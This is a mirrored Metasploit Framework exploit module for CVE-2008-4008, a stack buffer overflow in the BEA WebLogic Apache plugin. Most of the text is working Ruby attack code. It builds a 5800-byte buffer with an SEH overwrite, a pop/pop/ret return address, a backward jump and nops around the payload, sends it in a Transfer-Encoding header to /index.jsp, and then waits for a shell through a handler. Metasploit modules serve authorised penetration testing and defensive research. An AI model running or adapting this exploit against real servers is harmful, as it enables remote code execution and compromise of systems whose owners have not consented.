CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  HttpFingerprint = { :pattern => [ /Apache/ ] }

10


11
  include Msf::Exploit::Remote::HttpClient

12
  include Msf::Exploit::Remote::Seh

13


14
  def initialize(info = {})

15
    super(update_info(info,

16
      'Name'           => 'BEA Weblogic Transfer-Encoding Buffer Overflow',

17
      'Description'    => %q{

18
          This module exploits a stack based buffer overflow in the BEA

19
        Weblogic Apache plugin.  This vulnerability exists in the

20
        error reporting for unknown Transfer-Encoding headers.

21
        You may have to run this twice due to timing issues with handlers.

22
      },

23
      'Author'         => 'pusscat',

24
      'References'     =>

25
        [

26
          [ 'CVE', '2008-4008' ],

27
          [ 'OSVDB', '49283' ]

28
        ],

29
      'DefaultOptions' =>

30
        {

31
          'EXITFUNC' => 'seh',

32
        },

33
      'Privileged'     => true,

34
      'Platform'       => 'win',

35
      'Payload'        =>

36
        {

37
          'Space'    => 500,

38
          'BadChars' => "\x00\x0d\x0a",

39
          'StackAdjustment' => -1500,

40
        },

41
      'Targets'        =>

42
        [

43
          [  'Windows Apache 2.2 version Universal',

44
            {

45
              'Ret' => 0x1001f4d6,    #pop/pop/ret

46
            }

47
          ],

48
        ],

49
      'DisclosureDate' => '2008-09-09',

50
      'DefaultTarget'  => 0))

51
  end

52


53
  def exploit

54


55
    sploit = rand_text_alphanumeric(5800)

56
    sploit[5781, 8] = generate_seh_record(target.ret)

57
    # Jump backward to the payload

58
    sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff"

59
    sploit[0, payload.encoded.length+7] = make_nops(7) + payload.encoded

60


61
    datastore['VHOST'] = 'localhost'

62
    send_request_cgi(

63
      {

64
        'method'  => 'POST',

65
        'url'     => '/index.jsp',

66
        'data'    => '',

67
        'headers' =>

68
          {

69
            'Transfer-Encoding' => sploit

70
          }

71
      })

72


73
    handler

74


75
  end

76
end

77


78